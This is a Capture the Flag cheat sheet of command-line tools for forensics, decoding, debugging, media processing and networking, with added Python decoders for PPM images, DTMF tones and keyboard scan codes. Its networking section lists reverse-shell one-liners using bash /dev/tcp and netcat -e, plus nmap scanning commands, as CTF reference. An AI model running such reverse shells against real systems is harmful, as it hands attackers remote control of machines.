Concise Capture the Flag Cheat Sheet

Binaries and Metadata Extractors
  Guess file type using magic           $ file file
  Printable strings in binary file      $ strings file
  Hexadecimal dump                      $ xxd [-c16 -g2] file
                                        $ hexdump file
                                        $ od -tx1z file
  Binary hexadecimal editor             $ elvis [-c"display hex"] file
  Extract JPEG EXIF data                $ exiv2 img.jpeg
                                        $ jhead img.jpeg
  Extract PNG metadata                  $ pngcheck -7ptv img.png
  List tarball contents                 $ tar -tf tarball.tar
  List zip contents                     $ unzip -l file.zip
  Extract ID3 metadata                  $ id3info file.mp3

Encoding / Decoding
  Encode base64                         $ base64 [file]
  Decode base64                         $ base64 -di [file]
  (de)code caesar's                     $ caesar [0-25]
  Encode morse                          $ morse -s message
  Decode morse                          $ morse -d -- ... --- ...

Hashes
  md5sum                                $ md5sum file
  sha1sum                               $ sha1sum file
  sha256sum                             $ sha256sum file

Unix / Linux
  Extract tarball contents              $ tar -xvf tarball.tar
  Remove first 3 bytes                  $ tail -c +4 [file]
  Unzip                                 $ unzip file.zip

Disk Images / Forensics
  Mounting FS image                     $ mount fs.img mountpoint
  (override user/group)                   -o uid=user,gid=users
  List orphan inodes on disk image      $ ils fs.img
  List deleted files on disk image      $ fls -drp fs.img
  Output file contents from inode no.   $ icat fs.img 1337
  (Deleted) file contents on disk img.  $ fcat path/to/file fs.img

Databases
  Open sqlite database                  $ sqlite3 database.db
  List databases                        > .databases
  List tables                           > .tables
  Show table contents                   > select * from table;

Disassembly
  Disassemble program                   $ objdump -d prog
  Dump RO data section                  $ objdump -j .rodata -s prog
  List symbols from program             $ nm prog
  Disassemble (ndisasm)                 $ ndisasm prog
  Disasm. ncurses                       $ TERM=vt100 biew prog
  Assembly                              nasm, yasm, gas

Debugging
  simple / command line                 $ gdb ./program
    run program                         > r [parameters] [< redirects >]
    print backtrace                     > bt
    set breakpoint on foo               > b foo
    unset breakpoint(s)                 > delete breakpoint [no]
    next line (over)                    > n
    step line (into)                    > s
    next instruction (over)             > ni
    step instruction (into)             > si
    activate display next instr.        > display/i $pc
    continue execution                  > c
    save memory contents                > generate-core-file
  advanced / graphical                  $ edb ./program
  trace system calls                    $ strace ./program

Running and debugging Legacy/Other Systems
  DOS
    Open DOS with dir as C:             $ dosbox dir
    (debug mode)                        $ dosbox-debug dir
    Run prog in debug mode              C:\> debug prog.com
    DOSBox-debug step over              F10
    DOSBox-debug step into              F11
    DOSBox-debug scroll memory          PgUp / PgDn
    DOSBox-debug scroll program         + / -
  Windows
    Run executable                      $ wine prog.exe
    Debug executable                    $ winedbg prog.exe
    Debug executable                    $ ollydbg prog.exe
  IBM PC XT
    Start system                        $ fake86 -fd0 /usr/share/fake86/rombasic.bin
  Android
    dex to jar                          $ d2j-dex2jar classes.dex
    jar contents                        $ unzip classes.jar

Image Processing
  Editor (simple)                       $ pinta image
  Editor (advanced)                     $ gimp image
  Convert to pnm                        $ typetopnm image.type > image.pnm
  pnm (ppm) format                      P6                     (type)
                                        width height           (in printable digits)
                                        255                    (max color)
                                        RGBRGBRGBRGBRGB...     (× width × height)
  Bar/qrcode scanner                    $ zbarimg --raw image.png
  Gen. qrcode for word                  $ qrencode word -o image.png
  (from X selection)                    $ import i.png && zbarimg --raw i.png
  OCR in lng lang.                      $ tesseract [-l lng] i.png stdout
  Crop                                  $ convert -crop WxH+HP+VP i.png o.png
  Montage/Concat                        $ montage -mode concatenate *.png o.png

Video Processing
  Extract Frames                        $ ffmpeg -i video.mp4 frame-%4d.jpeg
  Downl. vid. (yt/etc)                  $ youtube-dl "https://example.com/etc"

Audio Processing
  Graphical editor / waveform           $ audacity audio.flac
  Spectrogram                           $ sox audio.flac -n spectrogram
  Extract notes from MIDI               $ midi2ly music.midi
  Generate music sheet                  $ lilypond music.ly

Decoding Phone Dialing Tones
  Decode DTMF                           $ sox tone.ogg -esigned-integer -b16 -r 22050 -t raw - |
                                          multimon-ng -c -a DTMF -
  Anything else                         $ sox ... | multimon-ng
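The "pnm (ppm) format" entry above is all you need to read a P6 file by hand, or to do the inverse job that turns up in CTFs: a raw RGBRGB... blob of known dimensions that only needs a header in front of it to become a viewable image. The following is an added example for this cheat sheet, not code from the original page or from netpbm; the sample image bytes are constructed inline and the function names are ours.

```python
"""Read and write binary PPM (P6) images with no external libraries."""
import re

TOKEN = re.compile(rb"\S+")


def parse_ppm(blob):
    """Parse a P6 PPM.

    Returns (width, height, maxval, pixels); pixels is a list of (r, g, b)
    tuples in raster order, top-left first. Header tokens may be separated by
    any whitespace and by '#' comments that run to end of line; exactly one
    whitespace byte separates the maxval from the raster data.
    """
    pos, tokens = 0, []
    while len(tokens) < 4:
        while pos < len(blob) and blob[pos:pos + 1].isspace():
            pos += 1
        if pos >= len(blob):
            raise ValueError("truncated PPM header")
        if blob[pos:pos + 1] == b"#":
            nl = blob.find(b"\n", pos)
            if nl < 0:
                raise ValueError("truncated PPM header")
            pos = nl + 1
            continue
        m = TOKEN.match(blob, pos)
        tokens.append(m.group(0))
        pos = m.end()
    if tokens[0] != b"P6":
        raise ValueError("not a P6 (binary RGB) PPM: magic %r" % tokens[0])
    width, height, maxval = (int(t) for t in tokens[1:])
    if not 0 < maxval < 65536:
        raise ValueError("bad maxval %d" % maxval)
    pos += 1                                   # the single separator byte
    bps = 1 if maxval < 256 else 2             # bytes per sample
    need = width * height * 3 * bps
    raster = blob[pos:pos + need]
    if len(raster) != need:
        raise ValueError("raster is %d bytes, expected %d" % (len(raster), need))
    if bps == 1:
        samples = list(raster)
    else:                                      # 16-bit samples are big-endian
        samples = [int.from_bytes(raster[i:i + 2], "big") for i in range(0, need, 2)]
    pixels = [tuple(samples[i:i + 3]) for i in range(0, len(samples), 3)]
    return width, height, maxval, pixels


def raw_rgb_to_ppm(width, height, rgb):
    """Prepend a P6 header to a raw 8-bit RGBRGB... blob so a viewer can open it."""
    if len(rgb) != width * height * 3:
        raise ValueError("expected %d bytes of RGB, got %d" % (width * height * 3, len(rgb)))
    return b"P6\n%d %d\n255\n" % (width, height) + bytes(rgb)


# Constructed sample: a 2x2 image with a red, a green, a blue and a white pixel.
SAMPLE_RGB = bytes([255, 0, 0, 0, 255, 0,
                    0, 0, 255, 255, 255, 255])
SAMPLE_PPM = b"P6\n# a comment inside the header\n2 2\n255\n" + SAMPLE_RGB

if __name__ == "__main__":
    print(parse_ppm(SAMPLE_PPM))
    with open("out.ppm", "wb") as f:        # open it with pinta/gimp or pnmtopng
        f.write(raw_rgb_to_ppm(2, 2, SAMPLE_RGB))
```

If a viewer shows a raw blob as a diagonally sheared image, the width is wrong; the total length divided by 3 factors into the candidate (width, height) pairs worth trying.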

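The DTMF pipeline above hands multimon-ng a raw stream of signed 16-bit little-endian samples (sox -esigned-integer -b16 -t raw). When multimon-ng is not installed, the same job is a few dozen lines: the Goertzel algorithm measures the power of the eight DTMF frequencies in each 20 ms frame, and a key counts only when one row tone and one column tone both dominate the frame for a few frames in a row. This is an added example for this cheat sheet, not code from the original page or from multimon-ng; synth_dtmf() constructs the sample input, and a real run would feed decode_dtmf() the bytes read from sox's stdout.

```python
"""Decode DTMF digits from raw 16-bit signed little-endian PCM."""
import math
import struct

LOW_FREQS = (697, 770, 852, 941)        # keypad rows
HIGH_FREQS = (1209, 1336, 1477, 1633)   # keypad columns
KEYPAD = ("123A", "456B", "789C", "*0#D")


def goertzel_power(frame, rate, freq):
    """Squared magnitude of `freq` in `frame` via the Goertzel recurrence.

    The closed form s1^2 + s2^2 - coeff*s1*s2 is exact for any frequency, so
    there is no need to round to an FFT bin.
    """
    w = 2.0 * math.pi * freq / rate
    coeff = 2.0 * math.cos(w)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def pcm16le_to_samples(raw):
    """Unpack the sox raw output format (-b16 -esigned, little-endian) to ints."""
    count = len(raw) // 2
    return struct.unpack("<%dh" % count, raw[:count * 2])


def frame_symbol(frame, rate, min_ratio=0.1):
    """Key pressed during one frame, or None for silence/noise.

    For a clean two-tone frame each tone's Goertzel power is about n/4 times
    the frame energy (sum of squares); white noise yields only about 1 times
    the energy at any frequency, so requiring min_ratio*n separates them.
    """
    n = len(frame)
    energy = float(sum(x * x for x in frame))
    if energy == 0.0:
        return None
    lo = [goertzel_power(frame, rate, f) for f in LOW_FREQS]
    hi = [goertzel_power(frame, rate, f) for f in HIGH_FREQS]
    row = max(range(4), key=lo.__getitem__)
    col = max(range(4), key=hi.__getitem__)
    if lo[row] < min_ratio * n * energy or hi[col] < min_ratio * n * energy:
        return None
    return KEYPAD[row][col]


def decode_dtmf(raw, rate=22050, frame_ms=20, min_frames=3):
    """Digits heard in `raw`. Repeated digits need a silent gap between them
    (as in a real dial); back-to-back identical tones merge into one."""
    samples = pcm16le_to_samples(raw)
    n = rate * frame_ms // 1000
    out, current, run = [], None, 0
    for i in range(0, len(samples) - n + 1, n):
        sym = frame_symbol(samples[i:i + n], rate)
        if sym == current:
            run += 1
            continue
        if current is not None and run >= min_frames:
            out.append(current)
        current, run = sym, 1
    if current is not None and run >= min_frames:
        out.append(current)
    return "".join(out)


def synth_dtmf(digits, rate=22050, tone_ms=100, gap_ms=50, amp=8000):
    """Constructed test input: each key as its two sine tones, then silence."""
    pcm = bytearray()
    for d in digits:
        row = next(r for r, keys in enumerate(KEYPAD) if d in keys)
        col = KEYPAD[row].index(d)
        fl, fh = LOW_FREQS[row], HIGH_FREQS[col]
        for t in range(rate * tone_ms // 1000):
            v = amp * (math.sin(2 * math.pi * fl * t / rate)
                       + math.sin(2 * math.pi * fh * t / rate))
            pcm += struct.pack("<h", int(v))
        pcm += b"\x00\x00" * (rate * gap_ms // 1000)
    return bytes(pcm)


if __name__ == "__main__":
    # With sox: sox tone.ogg -esigned-integer -b16 -r 22050 -t raw - | python3 dtmf.py
    import sys
    data = sys.stdin.buffer.read() if not sys.stdin.isatty() else synth_dtmf("1337*#")
    print(decode_dtmf(data))
```

The sample rate passed to decode_dtmf() must match the -r given to sox, otherwise every tone is scaled to the wrong frequency and nothing decodes.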
Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015 – Concise Capture the Flag Cheat Sheet v0.4
This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence, or (at your option), the GNU Free Documentation License version 1.3 or Later.
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets
Networking
  Info about port                       $ cat /etc/services | grep port
  Passive scanning
    Network traffic (graphical)         $ wireshark
    Network traffic                     $ tshark -i interface -f filter
    List interfaces                     $ tshark -D
    Wifi HTTP traffic                   $ tshark -i wlan0 -f "port 80"
    Filter syntax                       $ man pcap-filter
    Network traffic (altn.)             $ tcpdump
  Active scanning
    Open ports on host                  $ nmap [-sV -O -p prange] host
    List hosts on a network             $ nmap [-sn] 192.168.0.*
    Query txt DNS field                 $ nslookup -query=txt example.com
    Query DNS info (on srv)             $ dig [@srv] example.com
  Interacting
    Network cat (GNU/BSD)               $ netcat host port
    Network cat (nmap altn.)            $ ncat host port
    Telnet to host on port              $ telnet host port
  Reverse shell / Connect back
    netcat listen                       client$ netcat -vlp 1337
    Linux connect back                  $ sh >& /dev/tcp/client/1337 0>&1
    (colored)                           $ bash -i >& /dev/tcp/client/1337 0>&1
    Netcat connect back                 $ netcat -e /bin/sh localhost 1337
    (colored)                           $ nc -e "/bin/bash -i" localhost 1337
    Note: /dev/tcp is a bash feature, so the two redirection lines must be
    typed in bash (the redirections are set up before sh/bash -i starts);
    the -e option exists in GNU and nmap netcat but not in OpenBSD netcat.

Keyboard Scan Codes (US QWERTY)
        00      10      20      30      40      50
  +0    error   q       d       b       F6      KP 2
  +1    Esc     w       f       n       F7      KP 3
  +2    1       e       g       m       F8      KP 0
  +3    2       r       h       ,<      F9      KP Del
  +4    3       t       j       .>      F10     SysRq
  +5    4       y       k       /?      NmLck   -
  +6    5       u       l       RShift  ScLck   -
  +7    6       i       ;:      KP *    KP 7    F11
  +8    7       o       '"      LAlt    KP 8    F12
  +9    8       p       `       Space   KP 9    -
  +a    9       [{      LShift  CaLck   KP -    -
  +b    0       ]}      \|      F1      KP 4    -
  +c    -_      Enter   z       F2      KP 5    -
  +d    =+      LCtrl   x       F3      KP 6    -
  +e    Back    a       c       F4      KP +    -
  +f    Tab     s       v       F5      KP 1    -
  (code = column + row, e.g. 0x1e is "a"; the break code is the make code with bit 7 set)

Stuff to install (Arch Linux)
  Image processing                      $ pacman -S pinta gimp netpbm
  Image metadata                        $ pacman -S jhead exiv2 pngcheck
  QR/Barcode                            $ pacman -S zbar qrencode
  Disk image                            $ pacman -S sleuthkit libewf
  Networking (act.)                     $ pacman -S {gnu,openbsd}-netcat nmap
  Networking (psv.)                     $ pacman -S wireshark-{cli,gtk} tcpdump
  OCR                                   $ pacman -S tesseract tesseract-data-eng
  Encoding/Decoding                     $ pacman -S bsdgames
  8086 emulator                         $ pacman -U fake86-???.pkg.tar.gz  # AUR
  Dial Tones                            $ pacman -S archassault/multimon-ng
  Android                               $ pacman -S archassault/dex2jar
  Tools available                       $ pacman -Ql somekit | grep /bin/

Other stuff
  SQLi                                  https://github.com/sqlmapproject/sqlmap

Number/character conversion
                     Ruby                Haskell
  lib                                    import Data.Char
                                         (to-hexadecimal below also needs unfoldr from Data.List,
                                          listToMaybe from Data.Maybe and swap from Data.Tuple)
  char to int        'a'.ord             ord 'a'
  int to char        0x61.chr            chr 0x61
  from hexadecimal   "FF".to_i(16)       foldl1 (\x y -> x*16 + y) . map digitToInt $ "FF"
  to hexadecimal     255.to_s(16)        map intToDigit . reverse
                                         . unfoldr (\n -> listToMaybe [ swap $ n `divMod` 16 | n /= 0 ])
                                         $ 255

Dates
  Unix to Human                         $ date -d "@seconds"
  Human to Unix                         $ date -d "YYYY-mm-dd HH:MM:SS" +%s

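The scan-code table above is what you need when a challenge hands you a capture of PS/2 (set 1) keyboard traffic and asks what was typed: make codes are the table values, release codes are the same value with bit 7 set, and Shift/Caps Lock only change state. The decoder below is an added example for this cheat sheet, not code from the original page; the scan-code sequence it decodes is constructed inline. It covers only the single-byte codes in the table and skips the byte following an 0xE0 prefix (extended keys such as the arrows); USB HID keyboards use a different usage-ID table and are not handled here.

```python
"""Turn a stream of PS/2 set-1 scan codes into the text that was typed."""

# make code -> (unshifted, shifted) for the printable keys in the table
SCANCODES = {
    0x02: ("1", "!"), 0x03: ("2", "@"), 0x04: ("3", "#"), 0x05: ("4", "$"),
    0x06: ("5", "%"), 0x07: ("6", "^"), 0x08: ("7", "&"), 0x09: ("8", "*"),
    0x0a: ("9", "("), 0x0b: ("0", ")"), 0x0c: ("-", "_"), 0x0d: ("=", "+"),
    0x0f: ("\t", "\t"), 0x1a: ("[", "{"), 0x1b: ("]", "}"), 0x1c: ("\n", "\n"),
    0x27: (";", ":"), 0x28: ("'", '"'), 0x29: ("`", "~"), 0x2b: ("\\", "|"),
    0x33: (",", "<"), 0x34: (".", ">"), 0x35: ("/", "?"), 0x39: (" ", " "),
}
for _codes, _letters in ((range(0x10, 0x1a), "qwertyuiop"),
                         (range(0x1e, 0x27), "asdfghjkl"),
                         (range(0x2c, 0x33), "zxcvbnm")):
    for _c, _l in zip(_codes, _letters):
        SCANCODES[_c] = (_l, _l.upper())

LSHIFT, RSHIFT, CAPSLOCK, BACKSPACE, EXT_PREFIX = 0x2a, 0x36, 0x3a, 0x0e, 0xe0


def decode_scancodes(codes):
    """Decode an iterable of scan-code bytes (make and break codes) to text."""
    text = []
    shift = {LSHIFT: False, RSHIFT: False}
    caps = False
    skip_next = False
    for code in codes:
        if skip_next:                 # byte after 0xE0: extended key, ignored
            skip_next = False
            continue
        if code == EXT_PREFIX:
            skip_next = True
            continue
        make = code & 0x7f
        released = bool(code & 0x80)
        if make in shift:             # track Shift on both press and release
            shift[make] = not released
            continue
        if released:                  # everything else acts on key press only
            continue
        if make == CAPSLOCK:
            caps = not caps
            continue
        if make == BACKSPACE:
            if text:
                text.pop()
            continue
        if make not in SCANCODES:
            continue                  # F-keys, keypad, Ctrl, Alt: no text
        plain, shifted = SCANCODES[make]
        use_shift = shift[LSHIFT] or shift[RSHIFT]
        if plain.isalpha():           # Caps Lock inverts Shift for letters only
            use_shift ^= caps
        text.append(shifted if use_shift else plain)
    return "".join(text)


def scancodes_from_hex(text):
    """Parse the usual extracted form, e.g. '2a 2e ae aa', into a byte list."""
    return list(bytes.fromhex(text))


# Constructed sample: Shift+c, t, f, Shift+[, 2, 0, 1, 6, Backspace, 5, Shift+], Enter
SAMPLE_HEX = ("2a 2e ae aa  14 94  21 a1  2a 1a 9a aa  03 83  0b 8b  02 82  07 87"
              "  0e 8e  06 86  2a 1b 9b aa  1c 9c")

if __name__ == "__main__":
    print(repr(decode_scancodes(scancodes_from_hex(SAMPLE_HEX))))
```

When the capture interleaves keyboard and other device traffic, filter to the keyboard's packets first; a stray byte that lands in the middle of a make/break pair will silently flip the Shift state for everything that follows.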
